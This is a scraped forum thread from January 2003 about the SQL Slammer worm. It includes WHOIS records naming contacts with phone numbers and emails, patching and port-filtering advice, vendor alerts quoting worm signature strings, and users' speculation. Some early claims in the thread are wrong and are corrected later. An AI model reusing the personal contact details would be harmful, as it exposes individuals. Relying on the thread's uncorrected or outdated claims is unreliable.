OrgName: Cyber World Internet Services
OrgID: CWIS

NetRange: 66.206.0.0 - 66.206.31.255
CIDR: 66.206.0.0/19
NetName: CYBERWORLD-INT
NetHandle: NET-66-206-0-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS0.NIC-REG-DNS.COM
NameServer: NS1.NIC-REG-DNS.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-12-04
Updated: 2002-03-08

TechHandle: AS1239-ARIN
TechName: Slocombe, Alvin
TechPhone: +1-509-343-2100
TechEmail: alvins@cwiservices.com

OrgTechHandle: AS1239-ARIN
OrgTechName: Slocombe, Alvin
OrgTechPhone: +1-509-343-2100
OrgTechEmail: alvins@cwiservices.com

OrgName: Acetech USA, Inc
OrgID: ACETE-1

NetRange: 66.206.30.0 - 66.206.31.255
CIDR: 66.206.30.0/23
NetName: ACETECHUSA
NetHandle: NET-66-206-30-0-1
Parent: NET-66-206-0-0-1
NetType: Reassigned
NameServer: NS1.ACETECHUSA.COM
NameServer: NS2.ACETECHUSA.COM
Comment:
RegDate: 2003-01-16
Updated: 2003-01-16

TechHandle: MF976-ARIN
TechName: Ferris, Matt
TechPhone: +1-509-744-0590
TechEmail: matt.ferris@acetechusa.com

OrgTechHandle: MF976-ARIN
OrgTechName: Ferris, Matt
OrgTechPhone: +1-509-744-0590
OrgTechEmail: matt.ferris@acetechusa.com

# ARIN Whois database, last updated 2003-01-25 20:00
# Enter ? for additional hints on searching ARIN's Whois database.

OrgName: Cyber World Internet Services
OrgID: CWIS
Address: 124 S. Wall St. Suite 101 Spokane WA 99201
Country: US
Comment:
RegDate: 2001-12-04
Updated: 2002-12-10

AdminHandle: AS1239-ARIN
AdminName: Slocombe, Alvin
AdminPhone: +1-509-343-2100
AdminEmail: alvins@cwiservices.com

TechHandle: AS1239-ARIN
TechName: Slocombe, Alvin
TechPhone: +1-509-343-2100
TechEmail: alvins@cwiservices.com

# ARIN Whois database, last updated 2003-01-25 20:00
# Enter ? for additional hints on searching ARIN's Whois database.

OrgName: Acetech USA, Inc
OrgID: ACETE-1
Address: 124 S. Wall st. Suite 100 Spokane WA 99201
Country: US
Comment:
RegDate: 2003-01-16
Updated: 2003-01-16

AdminHandle: MF976-ARIN
AdminName: Ferris, Matt
AdminPhone: +1-509-744-0590
AdminEmail: matt.ferris@acetechusa.com

TechHandle: MF976-ARIN
TechName: Ferris, Matt
TechPhone: +1-509-744-0590
TechEmail: matt.ferris@acetechusa.com

# ARIN Whois database, last updated 2003-01-25 20:00
# Enter ? for additional hints on searching ARIN's Whois database.]]> http://www.dslreports.com/forum/remark,5787319 Sun, 26 Jan 2003 14:50:16 EDT http://www.dslreports.com/forum/remark,5787169 poiwv : Bigtuna,

WOW, that sucks!]]> http://www.dslreports.com/forum/remark,5787169 Sun, 26 Jan 2003 14:35:15 EDT http://www.dslreports.com/forum/remark,5786993 scottkeen : Well... I went over to my co-lo data center with a CD with the SP3 patch and the eEye scanner in hand, ready to patch my server.

I walked out of the data center with my server, instead.

The data center apparently had gone out of business (no, not related to SQL Slammer)

I chatted with the owner a little bit about SQL Slammer. I was surprised to learn that as the operator of the data center, he had NO IDEA ABOUT SQL SLAMMER. He was in his data center cleaning things up, wondering why he was having 100% packet loss.

I told him to filter port 1434 on his gateway, reboot all the Windows servers in the data center (dozens of them), and I gave him the CD with the patch.

Welll, now my server is homeless. Trying to find a co-lo data center in the Reston or Herndon, Virginia area. If anyone knows of one that's affordable -- please let me know. Or, if anyone in the Reston/Herndon area is up for it, maybe we can work out a deal to let me throw my server on your T1 or DSL line.]]> http://www.dslreports.com/forum/remark,5786993 Sun, 26 Jan 2003 14:18:16 EDT http://www.dslreports.com/forum/remark,5786960 SKiTLz : this entire thing just backs up my train of thought!!

micrsoft OS as server... first dumb step but can be doable..

using micrsoft applications as servers... fuckin stupid...

because of the influence microsoft has on the market look waht happened... one attack and it brings down half the interenet, banks, atm's, eftpos across north america and the world....

nothing should be that vulnerable.. not with the knowledge people have today!

and on that note.. whats with U sys admins not keeping your bloody systems up to date? the patch has been out for bout 6 months... if irresponsible sys admins did there job this worm couldnt have touched anyone!]]> http://www.dslreports.com/forum/remark,5786960 Sun, 26 Jan 2003 14:15:18 EDT http://www.dslreports.com/forum/remark,5786769 astirusty :

said by Link Logger :

---

I would hope that response teams are starting to figure out that the biggest attacks are staged to occur on weekends (so go drinking during the week and stay out of the bar on a Friday night, I know of at least one meeting on Monday where this will be bought up very loudly).

---

I hope some people who have SQL servers in their ORGs start asking themselves why a problem that had a solution over 5 months ago was not taken care of.
I also hope Mgmt at various companies will finally wake up and quit insisting on using a OS that is know for 1) it's poor security & 2) for being a hacker's heaven.

I do believe the response teams did a great job.
--
The system is down again! Okay, who forgot to empty /dev/null?
[text was edited by author 2003-01-26 14:23:47]
]]> http://www.dslreports.com/forum/remark,5786769 Sun, 26 Jan 2003 14:00:24 EDT http://www.dslreports.com/forum/remark,5786407 poiwv : Thanks for the link NameGame.]]> http://www.dslreports.com/forum/remark,5786407 Sun, 26 Jan 2003 13:27:32 EDT http://www.dslreports.com/forum/remark,5786070 Name Game : Updated: January 26, 2003

How do I tell of I have MSDE or SQL Server 2000 installed on my system?

Go to "Start" then "Search" and search the local system for the file "sqlserver.exe". If this file is present on your system, then you have MSDE or SQL Server installed. Next right click on this file and select "properties" then "product version". If the product version is between 8.00.0194 and 8.00.0533 you are running SQL Server 2000 or MSDE 2000 then you need to install SQL Server SP2 before you install this patch.

Next right click on this file and select "properties" then "product version". If the product version is between 8.00.0194 and 8.00.0533 you are running SQL Server 2000 or MSDE 2000 and need the updates discussed by this bulletin.

What do I need to do to make sure that my MSDE installation is updated?

That depends on what product you are using with MSDE. If you are using MSDE with any of the products listed above except Application Center 2000, you need to ensure you have first installed MSDE 2000 Service Pack 2 since this security patch requires Service Pack 2 to be installed. Once you have installed MSDE 2000 Service Pack 2 you need to install the SQL Server 2000 patch.

If you are running Microsoft Application Center 2000, you need to install a version of MSDE Service Pack 2 which is specifically intended to be used with Application Center. This service pack is available at: »download.microsoft.com/download/···3058.exe. Once you have installed the Application Center version of MSDE Service Pack 2, you should install the SQL Server 2000 security patch. More information on the Application Center specific version on MSDE 2000 Service Pack 2 is available in Microsoft Knowledge Base article Q813115.

»www.microsoft.com/technet/treevi···-061.asp

Microsoft Security Bulletin MS02-061

Summary
Who should read this bulletin: System administrators using Microsoft® SQL Server™ 7.0, SQL Server 2000, Microsoft Data Engine (MSDE) 1.0, and Microsoft Desktop Engine (MSDE) 2000. ]]> http://www.dslreports.com/forum/remark,5786070 Sun, 26 Jan 2003 12:50:47 EDT http://www.dslreports.com/forum/remark,5786002 tons of fun : »sd.ihr.daze.net/

Last Updated: Sunday, January 26, 2003 at 09:20 PST (January 26 17:20 GMT)

Name Location Status Packet Loss Latency (min/avg/max)
AGIS 205.137.48.5 GREEN 0% 67 / 68 / 68 / 0
ANS 192.103.63.100 GREEN 0% 88 / 89 / 89 / 0
AOL 152.163.136.1 RED 100% ???
CERFnet East 207.252.96.3 RED 100% ???
DataX 199.190.65.3 RED 100% ???
Digital Daze 161.58.193.134 GREEN 0% 73 / 74 / 74 / 0
DNS Central 130.94.96.3 GREEN 0% 0 / 0 / 0 / 0
ELI Portland 207.173.112.17 GREEN 0% 32 / 32 / 32 / 0
GoodNet 207.98.128.33 GREEN 0% 77 / 77 / 77 / 0
IBM 165.87.194.244 GREEN 0% 69 / 75 / 123 / 12
MCI 204.70.128.1 GREEN 0% 89 / 89 / 90 / 0
MCI MAE-West 198.32.136.89 GREEN 0% 16 / 16 / 28 / 2
Sprintlink 204.117.214.10 GREEN 0% 13 / 13 / 16 / 0
UUNET/Alternet 137.39.1.3 GREEN 0% 83 / 83 / 83 / 0
Verio 204.91.99.140 GREEN 0% 81 / 81 / 82 / 0
Review the past 24 hours. ]]> http://www.dslreports.com/forum/remark,5786002 Sun, 26 Jan 2003 12:42:22 EDT http://www.dslreports.com/forum/remark,5785980 poiwv : Earlier, I posted that I recorded a hit from it before 12:31 from So. California, and psloss had one from somewhere else, so that hit from Japan may not be the first.
--
Advertising may be described as the science of arresting the human intelligence long enough to get money from it. ]]> http://www.dslreports.com/forum/remark,5785980 Sun, 26 Jan 2003 12:39:47 EDT http://www.dslreports.com/forum/remark,5785929 CjGaughan : Maybe this is what's wrong with www.themexp.com ?? Been all over the news (local tv, radio, national, etc.)]]> http://www.dslreports.com/forum/remark,5785929 Sun, 26 Jan 2003 12:33:35 EDT http://www.dslreports.com/forum/remark,5785869 tons of fun : I think China....is "Lion" attributed to this activity??

Please stay in touch!!

Thanks...be well....]]> http://www.dslreports.com/forum/remark,5785869 Sun, 26 Jan 2003 12:27:10 EDT http://www.dslreports.com/forum/remark,5785792 bennyandthejets : Now that things have settled down a bit.:) Any ideas where this worm may have originated from ?

The first recorded hit came in at 12:31 AM Sat.
from IP: 218.47.250.221 which I guess came from Japan or the surrounding area. (i250221.ap.plala.or.jp)]]> http://www.dslreports.com/forum/remark,5785792 Sun, 26 Jan 2003 12:18:01 EDT http://www.dslreports.com/forum/remark,5785017 Just Bob :

said by reluctant sql admin:

---

Just Bob, you said this one only infected Windows 2000. That is incorrect. This worms infects SQL Server 2000, including the desktop version (MSDE 2000), which is included with a lot of products, including Microsoft Office XP Professional or Developer, and MS Access 2002!

Any computer that is running MSDE 2000 can be infected by the worm. That includes every version of Windows from Windows 95 on to Windows Server 2003.

---

Thanks to reluctant and psloss for that clarification. As always, the quickest way to learn is to post the wrong answer. ;-)]]> http://www.dslreports.com/forum/remark,5785017 Sun, 26 Jan 2003 10:45:00 EDT http://www.dslreports.com/forum/remark,5784682 anon : There is a scanner available to find vulnerable systems. The free version can scan up a to class C address at once.

Get it here: »www.eeye.com/html/Research/Tools···QL.html

Also, Microsoft this morning released an updated patch kit for SQL Server 2000 and MSDE 2000, that allegedly eliminates needing to manually copy files and run manual commands. Supposedly, installing the patch only requires two clicks, so most Windows administrators should be able to handle it (ducking for cover....)

You can get the new patch kit here:
»www.microsoft.com/technet/treevi···mer.asp

PSS Security Response Team Alert - New Worm: W32.Slammer
UPDATED: January 26, 2003
SEVERITY: CRITICAL
DATE: January 25, 2003
PRODUCTS AFFECTED: SQL Server 2000 RTM, SQL Server 2000 SP1, SQL Server 2000 SP2, and Microsoft SQL Desktop Engine Version (MSDE) 2000 ]]> http://www.dslreports.com/forum/remark,5784682 Sun, 26 Jan 2003 09:50:58 EDT http://www.dslreports.com/forum/remark,5784575 psloss :

said by Link Logger :

---

I would hope that response teams are starting to figure out that the biggest attacks are staged to occur on weekends (so go drinking during the week and stay out of the bar on a Friday night, I know of at least one meeting on Monday where this will be bought up very loudly).

---

Amen.

said by Link Logger :

---

From the worm's author perspective, I'm betting that he didn't think it was going to propagate so fast and had he known that he would have waited until Saturday night to launch it as I think the idea was to have Superbowl activities interfere with the overall response to the worm.

---

Interesting, because we've been wondering about this for other malware, too...

Let me ask what you think about another factor: the filtering. Do you think the author anticipated the much more active response when compared to the worms over tcp/80? In other words, the author may not have anticipated how quickly the worm took off, but I'm also guessing the author also didn't anticipate how quickly it was brought under some sense of control -- I would assume that the decision/implementation to filter udp/1434 is much more straightforward than tcp/80.

Just wondering,

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5784575 Sun, 26 Jan 2003 09:31:22 EDT http://www.dslreports.com/forum/remark,5784555 anon : Just Bob, you said this one only infected Windows 2000. That is incorrect. This worms infects SQL Server 2000, including the desktop version (MSDE 2000), which is included with a lot of products, including Microsoft Office XP Professional or Developer, and MS Access 2002!

Any computer that is running MSDE 2000 can be infected by the worm. That includes every version of Windows from Windows 95 on to Windows Server 2003.

A lot of products that include MSDE don't make it clear to users that they are installing a version of SQL Server on their computers. There are probably millions of computers that have MSDE 2000 installed and running.

MSDE and SQL Server aren't checked or updated by Windows Update or Office Update. In fact, the patches and updates for MSDE and SQL Server are hard to find install; first you have to know that you need them, then you have to know where to look, then wade through a bunch of confusing web pages that obviously weren't written by someone for whom logical thinking is normal, follow obscure and incomplete installation instructions (some crucial steps are only implied and are easily missed) that require you to manually copy a bunch of files and run several commands from a DOS prompt without being told what to type, etc. etc.

]]> http://www.dslreports.com/forum/remark,5784555 Sun, 26 Jan 2003 09:29:04 EDT http://www.dslreports.com/forum/remark,5784540 anon : Is there a tool or perl script available to detect vunerable hosts?

Thanks.
]]> http://www.dslreports.com/forum/remark,5784540 Sun, 26 Jan 2003 09:26:49 EDT http://www.dslreports.com/forum/remark,5784502 psloss :

said by Just Bob :

---

This one only affected w2k, so you should be ok.

---

This worm can affect any unpatched and unprotected installation of SQL Server 2000 or MSDE 2000. The worm will run just fine on MSDE 2000 running on Windows Millenium Edition, which I would take to mean it will run any Windows OS that can install it, including Windows 98 or XP Home/Pro:
»Re: New Worm - UDP 1434 - SQL Server Monitor??

I think all SQL Server 2000 and MSDE 2000 installs should be patched, but definitely ones that are exposed to the Internet.

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5784502 Sun, 26 Jan 2003 09:20:41 EDT http://www.dslreports.com/forum/remark,5784484 Name Game : PSS Security Response Team Alert - New Worm: W32.Slammer
SEVERITY: CRITICAL

DATE: 1/25/2003

PRODUCTS AFFECTED: SQL Server 2000 RTM, SQL Server 2000 SP1, SQL Server 2000 SP2, and Microsoft SQL Desktop Engine Version (MSDE) 2000

**********************************************************************

WHAT IS IT?

The PSS Security Response Team is issuing this alert to inform customers about the W32.Slammer worm, which is currently spreading in the wild. You are not at risk unless you are running one of the above listed products. Customers are advised to review the information and take the appropriate action for their environments.

This alert is primarily focused at business customers.

IMPACT OF ATTACK:

Denial of Service

TECHNICAL DETAILS:

The W32.Slammer is a memory resident worm that propagates via Port 1434 utilizing a vulnerability that was patched in Microsoft Security Bulletin MS02-039. This bulletin was first available on July 24, 2002.

(Complete Info at this link)

»www.microsoft.com/technet/treevi···mmer.asp]]> http://www.dslreports.com/forum/remark,5784484 Sun, 26 Jan 2003 09:16:15 EDT http://www.dslreports.com/forum/remark,5784417 Feivel1 : I got hit with my first on 1434. 3 times in the last 10 minutes and they were all from other users on my iSP. Apparently they are filtering 1434 but not internally. Very weird or shall we say...forgetfull (I really wanted to say STUPID).
--
Feivel]]> http://www.dslreports.com/forum/remark,5784417 Sun, 26 Jan 2003 09:03:07 EDT http://www.dslreports.com/forum/remark,5784391 anon : »christpuncher.kingsmeade.net/~jd···l-2003/

some detailed advisories there, and very interesting graphs from around 12:30am when this hit. ]]> http://www.dslreports.com/forum/remark,5784391 Sun, 26 Jan 2003 08:52:31 EDT http://www.dslreports.com/forum/remark,5784377 Just Bob : broadsword,

This one only affected w2k, so you should be ok.]]> http://www.dslreports.com/forum/remark,5784377 Sun, 26 Jan 2003 08:49:31 EDT http://www.dslreports.com/forum/remark,5784048 broadsword : Okay, now I feel really stupid. I am a home user and have had SQL2000 running all the time on my XP Pro machine. It installed with vb.net and I had used it rarely while I was trying to learn to code with it. So today when I rebooted after applying a Windows update, NIS2003 alerted me that sqlmangr.exe was attempting to access the internet, should I block? I did, and immediately started poking around to find out why, and came to this forum. I have subsequently stopped and changed the properties of MSSQL$NetSDK in the Services applet to only run upon Manual, and rebooted to verify it was stopped. Now I am concerned that since I had this on the entire time that I may have been infected. I opened up my Log Viewer (the free application that works with my Linksys router) and looked at the logs, but I don't see anything with type UDP blocked on port 1434. But there are a bunch of blocked listings with TCP on port 1434. In fact, I can't see anything with type UDP in the log. (It's that free Log Viewer...maybe I should change to the pay one?) Sorry...but I am a very much and unsure novice when it comes to this virus and security stuff and feel stupid that I had the blasted SQL server icon running green in my taskbar and never even thought about the risks. (It is definitely not running now...appears with the red block and is definitely not making any network connections.) Anyway, over the past few days, I have done online purchases etc from the same machine. Should I be worried at this point that some of my information was compromised if I had been infected? ]]> http://www.dslreports.com/forum/remark,5784048 Sun, 26 Jan 2003 06:54:32 EDT http://www.dslreports.com/forum/remark,5783909 Link Logger : SQL Slammer is not the first mass worm to not survive a restart, as Code Red could be clear out with a restart (and it proved itself rather hardy and provided evidence that surviving a restart isn't critical for mass success), but the upside to this is that it allows the worm to be purely memory resident, which means it can't be easily picked up by virus scanners (also if the goal is to leave no damage or physical impact to the infected system then a memory resident is the ultimate). Plus with the infection rate as high as it was, it wouldn't take long to infect a system after a reboot. I'm sure more then a couple of systems crashed during their attacks, but given the autostart features of SQL Server it would be reinfected quickly. I wonder how many admins seeing a system that was 'freaking out' rebooted it and watched it for a minute and then rushed off to another system thinking that everything was OK, only to find it reinfected later.

The authors of Code Red II and Sir Cam for example built in kill dates such that their worms would totally shut down. To me this is the sign of an uber worm author (actually we think that Code Red had two authors, one for the vul and one for the bulk, the bulk guy was the true uber and I would suspect was the single author of Code Red II). Take the spotlight, perform and then leave the stage clear for the next performer. These guys have transcended the ego typical of most worm authors.

Blake]]> http://www.dslreports.com/forum/remark,5783909 Sun, 26 Jan 2003 05:41:30 EDT http://www.dslreports.com/forum/remark,5783875 skeebercat : Marilla, your exactly right, I've learned more about security from this thread, than I have the last 6 years online.

Do any of you think this was a 'test run' for something bigger and nastier? Obviously the streamlined format of this worm worked....
--
Eagles may soar, but cats don't get sucked into jet engines]]> http://www.dslreports.com/forum/remark,5783875 Sun, 26 Jan 2003 05:23:41 EDT http://www.dslreports.com/forum/remark,5783858 Marilla : Good summary of info. I particularly liked your last two bits of analysis...

First, I think the author did really misjudge how fast this thing would toss itself out there; the payload was so SMALL, and in UDP, that it could fly out the gates. I would not be surprised to hear numbers in the single or low-double digits of minutes as far as how long it took this worm to go from 0 to OUCH!

And the second point possibly might be due in part to one thing about Slammer: It did not carry any destructive payload, or make any attempt to survive a restart of the SQL service. Then again, in order to do that, it would have had to have been much larger, and therefore it would have propagated much more slowly. Although it looks like this person misjudged, my personal opinion is that they did intend for it to just spread quickly, wipe out the 'net for a while, and then disappear.

All that aside, I do believe "The Internet" recovered very well; The hardware and the people.

And while I'm at it, I want to take a moment to thank the people here, among whom I was posting and reading here long before anyone else I had contact with really had any idea what was up. This very thread has been my #1 best source to find information on this, particularly in the early hours. So tip those hats, people! :)]]> http://www.dslreports.com/forum/remark,5783858 Sun, 26 Jan 2003 05:12:20 EDT http://www.dslreports.com/forum/remark,5783776 Link Logger : So here is my short post incident review of the SQL Slammer. This puppy was bad and propagation speed was probably the fastest I have ever seen, which includes Code Red and Nimda and many others over the years. While Code Red and Nimda propagated further as there were certainly more machines available for them to infect, SQL Slammer consumed its available victims at a tremendous rate. One reason I would offer is the location of a large percentage of victim boxes on fatter faster pipes. A number of Code Red infected systems were in fact home systems. The main reason for the propagation rate was the fact that it used a UDP port which removed the handshake overhead of a TCP connection. This combined with the fact that the worm itself was very small meant that an infect system could scan and attack other systems at a phenomenal rate. This rapid infection rate combined with the rapid scan/attack rate was extremely hard on bandwidth capacities that crippled more then one area of the internet.

The attack itself was very short lived as within 24 hours scan rates have fallen dramatically as the internet and its users are getting better at identifying, communicating, and solving these sorts of attacks (practice is making us better unfortunately). Fortunately so far mass worm authors are glory hogs as two or more large attacks simultaneously or staged in sequence would likely cause such problems that it could very well bring down the internet as we know it. Two or more attacks simultaneously would tax the ability of response teams to identify, communicate and solve the threat. I would hope that response teams are starting to figure out that the biggest attacks are staged to occur on weekends (so go drinking during the week and stay out of the bar on a Friday night, I know of at least one meeting on Monday where this will be bought up very loudly).

From a home user perspective this worm generated far less scan traffic then Opaserv did, but yet Opaserv still operates relatively unmolested. We will continue to see scans from SQL Slammer forever, just as we still do from Code Red and Nimda as there are a number of unadministered systems out there which will never be patched or otherwise fixed. On the up side, the number of Opaserv scans were reduced by having Korea off line for a while (hint here for Korea).

From a corporate user perspective this is yet another example of what happens when you don't administer or secure systems properly. Most of the infected systems had no need to expose the SQL Server Monitor service to the internet, which is an example of people not understanding what needs to be secured. The fact that this worm used a known vulnerability and a patch has existed for some time has become a common theme in mass worms. Companies still do not have the resources required to properly maintain systems or their security. I believe that a number of companies were under the impression that stricter hacker laws were going to protect them, so internal resource were not needed. No one has ever been caught or prosecuted for any of the mass worm attacks on the internet (Code Red, Nimda, Opaserv, SQL Snake, etc), so it is folly to remain under the impression that tough hacker laws are going to prevent future mass attacks. Tough hacker laws will prevent more junior hackers from moving up the ladder, but pros know that catching them is very difficult to do if they keep their mouth shut and don't hang themselves. I hope companies consider what would have happened if a routine was added to SQL Slammer that deleted or worse poisoned their data as it easily could have been the case. Its one thing to have a web server compromised, but it is entirely another to have your database compromised. Hackers like to start with web servers, as it's the best place to find accounts and password to the database. The database is considered the mother lode to a pro.

From the worm's author perspective, I'm betting that he didn't think it was going to propagate so fast and had he known that he would have waited until Saturday night to launch it as I think the idea was to have Superbowl activities interfere with the overall response to the worm.

In short the internet once again successfully adapted and defended itself from attack, only to be likely attacked again in the near future.

Blake

]]> http://www.dslreports.com/forum/remark,5783776 Sun, 26 Jan 2003 04:27:17 EDT http://www.dslreports.com/forum/remark,5783255 Marilla :

said by scottkeen :

---

y'know...when I ping my server with 4 packets, I can usually get 1 packet through but timeout on the other 3.

---

It sounds like your server is still infected. I was getting from 66-80% packet loss (with high latency on those that did get replies) on mine when it was infected.

The trouble is you can't do just one of patching, blocking port 1434, or rebooting; You have to do all three. Actually, blocking port 1434 isn't neccesary if you do the other two, and if might not even help if you don't do BOTH of the other two... In short, it's really the least important thing to do.

First, if they block port 1434, they might only block it incoming (which would not be what they SHOULD do.. but still). If that's what they do, not only will your server continue to rack up the bandwidth bills for you, but it basically won't be protected at all: It's already infected, so preventing INCOMING connections doesn't do anything.

Then, even if they reboot it also, if there are any other co-lo customers who are infected, your server will be infected again shortly after rebooting. The only way to be sure to fix it with port blocking and rebooting is to make sure that ALL infected servers behind the firewall are 'off' at the same time, so that when they re-start, there are no infected servers still running.

But if you get the patch done, and reboot, it won't even matter if they block port 1434 or not; You won't be infected by it again.

So what you need to have done is that the server is unplugged from the 'net Or that the SQL Service is stopped. Then the patch must be applied. Then the server should be rebooted. That should have you set.. you need to get on them to get that done, or go up there and do it yourself, depending on what sort of setup you have. Usually with co-location, they won't do that sort of thing FOR you.... without charging you $50 an hour or so. ]]> http://www.dslreports.com/forum/remark,5783255 Sun, 26 Jan 2003 02:05:52 EDT http://www.dslreports.com/forum/remark,5782975 scottkeen : Well, I still can't ping my server at the co-lo data center.

I think the data center hasn't figured out how to filter out port 1434.

That, or else they've gone into a super max lock-down mode until they find the offending servers in their data center.

edit: y'know...when I ping my server with 4 packets, I can usually get 1 packet through but timeout on the other 3.
[text was edited by author 2003-01-26 01:25:09]
]]> http://www.dslreports.com/forum/remark,5782975 Sun, 26 Jan 2003 01:22:15 EDT http://www.dslreports.com/forum/remark,5782935 ISPTech :

said by jrsjkd :

---

must be gettin a hold on the situatuion now........

»www.internetpulse.net/

---

Actually, if you drill down on any of the UUnet links, you'll see that the Dallas agent simply isn't reporting any more. Most of the red on that chart for quite some time has been caused by the Dallas UUnet agents high latency. Go to the last day chart and drill down on UUnet and you see it's still reflected there.]]> http://www.dslreports.com/forum/remark,5782935 Sun, 26 Jan 2003 01:16:54 EDT http://www.dslreports.com/forum/remark,5782486 rotorouter7 : COULD be?????

How about locking up several GigEth ports? >:-(

Who thinks of this crap???]]> http://www.dslreports.com/forum/remark,5782486 Sun, 26 Jan 2003 00:19:09 EDT http://www.dslreports.com/forum/remark,5782115 Marilla :

said by pcdebb :

---

...looking at traffic *IS* important...

---

I don't mean to detract from the importance of that - you are absolutely correct that it is important to keep an eye on that sort of thing.

Also, if you are unable to make any sort of connection to that server, that is most likely a good possibility. Somehow, you'll need to get it disconnected (or at least get the SQL Server shut down) then get it patched, then rebooted.. but you already heard all this! hehe

Good luck to ya!! :)]]> http://www.dslreports.com/forum/remark,5782115 Sat, 25 Jan 2003 23:36:57 EDT http://www.dslreports.com/forum/remark,5782111 jrsjkd : must be gettin a hold on the situatuion now........

»www.internetpulse.net/]]> http://www.dslreports.com/forum/remark,5782111 Sat, 25 Jan 2003 23:36:34 EDT http://www.dslreports.com/forum/remark,5781598 pcdebb :

said by Marilla :

---

Forget about checking your traffic. It's of no use to you, really, to do that. It's useful for those trying to figure out what this does and how it works, but for those of us simply needing to be sure we are safe/recover from it, this is all you need to know:

If you have SQL Server 2000 installed on any server, be 100% sure it has Service Pack 3, which was just released last Friday, the 17th. If you already patched since then, you are perfectly fine. If you look and find you don't yet have it, do it, and then reboot the server. You will then be fine from this.

It doesn't neccesarily seem likely that your web server would just 'act strange' from this if it were actually infected... but if that server has SQL2K and does not have SP3 yet, get it on there, and get that server restarted. The reboot might fix any other weirdness there is anyway.

---

thanx for your words of wisdom, if i didnt have sql on there i wouldnt be asking for help, and no i hadn't updated the sp yet. i was told it was acting wierd, but I keep timing out trying to connect to it so I know something is up. looking at traffic *IS* important
--
I was playing poker with tarot cards.. i got a full house and four people died.]]> http://www.dslreports.com/forum/remark,5781598 Sat, 25 Jan 2003 22:46:40 EDT http://www.dslreports.com/forum/remark,5781549 Marilla :

said by erickbe :

---

Does anyone know how to check your Windows box to see what SQL service pack you have applied is (version # of a DLL or something)? Just wondering...

---

Go to Query Analyzer and run a query...

err.. someone shoot me if I'm wrong, but is it not:

SELECT @@VERSION

??


Incidentally, though.. this is fairly easy: Has the SQL Server been patched since last Friday with a service pack? If you don't think so, it's fairly safe to just go ahead and grab it and run with it. Also, if my instructions were wrong, I believe the download pages for SP3 have a link to how to tell what your version is... it should tell you a more detailed query to run and what exactly it SHOULD show if you are updated.
[text was edited by author 2003-01-25 22:43:44]
]]> http://www.dslreports.com/forum/remark,5781549 Sat, 25 Jan 2003 22:42:05 EDT http://www.dslreports.com/forum/remark,5781529 erickbe : Does anyone know how to check your Windows box to see what SQL service pack you have applied is (version # of a DLL or something)? Just wondering...

]]> http://www.dslreports.com/forum/remark,5781529 Sat, 25 Jan 2003 22:39:50 EDT http://www.dslreports.com/forum/remark,5781481 Mark : Oops Justin, misread the destination.

Maybe it was made to broadcast in order to generate even more udp traffic on an infected segment, in order to magnify its effectiveness.
Or...
Maybe whoever started this wanted to give sysadmins a hand in detecting? Perhaps they made it broadcast with a ttl of 1 so it would only be seen by someone on the same segment...

I really have no idea, just unlikely speculations.
[text was edited by author 2003-01-25 22:36:58]
]]> http://www.dslreports.com/forum/remark,5781481 Sat, 25 Jan 2003 22:35:18 EDT http://www.dslreports.com/forum/remark,5781427 Marilla : Forget about checking your traffic. It's of no use to you, really, to do that. It's useful for those trying to figure out what this does and how it works, but for those of us simply needing to be sure we are safe/recover from it, this is all you need to know:

If you have SQL Server 2000 installed on any server, be 100% sure it has Service Pack 3, which was just released last Friday, the 17th. If you already patched since then, you are perfectly fine. If you look and find you don't yet have it, do it, and then reboot the server. You will then be fine from this.

It doesn't neccesarily seem likely that your web server would just 'act strange' from this if it were actually infected... but if that server has SQL2K and does not have SP3 yet, get it on there, and get that server restarted. The reboot might fix any other weirdness there is anyway.]]> http://www.dslreports.com/forum/remark,5781427 Sat, 25 Jan 2003 22:30:06 EDT http://www.dslreports.com/forum/remark,5781378 justin :

said by Mark :

---

I'd say you have 2 infected servers on your network segment bouncing traffic back and forth.

---

No, the log I included shows its one server (belonging to someone else) doing the random IP destination thing, but for some reason, my interface is getting CC'd on its traffic.]]> http://www.dslreports.com/forum/remark,5781378 Sat, 25 Jan 2003 22:24:51 EDT http://www.dslreports.com/forum/remark,5781353 psloss : Another article; apologies if it's a redundant link from some other post in this thread. I thought it was interesting the note about the root servers and other effects:
»www.eweek.com/article2/0,3959,845164,00.asp

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5781353 Sat, 25 Jan 2003 22:22:14 EDT http://www.dslreports.com/forum/remark,5781338 pcdebb : how do i check my traffic? this thread is 14 pages long and I need to check it now. this computer has sql server but i havent noticed any dip in traffic, but my webserver across town has been acting strange all day, but i didn't think it was related to this. this computer is behind a router and running kerio firewall. the other has just kerio and secureiis
--
I was playing poker with tarot cards.. i got a full house and four people died.]]> http://www.dslreports.com/forum/remark,5781338 Sat, 25 Jan 2003 22:21:08 EDT http://www.dslreports.com/forum/remark,5781243 Randy Bell : and also from McAfee: »vil.mcafee.com/dispVirus.asp?virus_k=99992

Name: W32/SQLSlammer.worm

Risk Assessment
- Home Users: Low-Profiled
- Corporate Users: High
Date Discovered: 1/25/2003
Date Added: 1/25/2003
Origin: Unknown
Length: 376 byte data stream
Type: Internet Worm
SubType: SQL worm
DAT Required: N/A

This threat has a special Risk Assessment - it is "High" only for unpatched systems (only affects SQL servers not running SP3):

* Microsoft SQL Server 2000
* Microsoft Desktop Engine (MSDE) 2000

This virus exists only in memory of unpatched Microsoft SQL servers. Its purpose is simply to spread from one system to another and it does not carry a destructive payload.

This worm causes increased traffic on UDP port 1434 and spreads between SQL servers. Heavy network traffic, associated with this threat, can effect network performance on all systems on the network.

It uses a buffer overflow in "Server Resolution" service (read about CVE-CAN-2002-0649 vulnerability in MS02-39 and CVE list) to gain control on a target server. SQL Servers running Service Pack 3 are not affected.

The malformed packet is only 376 bytes long (which is the full worm!) and carries the following strings: "h.dllhel32hkernQhounthickChGetTf", "hws2", "Qhsockf" and "toQhsend".

The minimal risk for this worm has been set to Low-Profiled because of the media attention at CNN.
--
"But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13)]]> http://www.dslreports.com/forum/remark,5781243 Sat, 25 Jan 2003 22:11:57 EDT http://www.dslreports.com/forum/remark,5781186 Randy Bell :

said by scottkeen :

---

Thank goodness -- not another CNN link.

---

Here's a press release from an AV-vendor:

Panda Software alerts on W32/SQLSlammer
»www.pandasoftware.com/about/pres···cia=2681
--
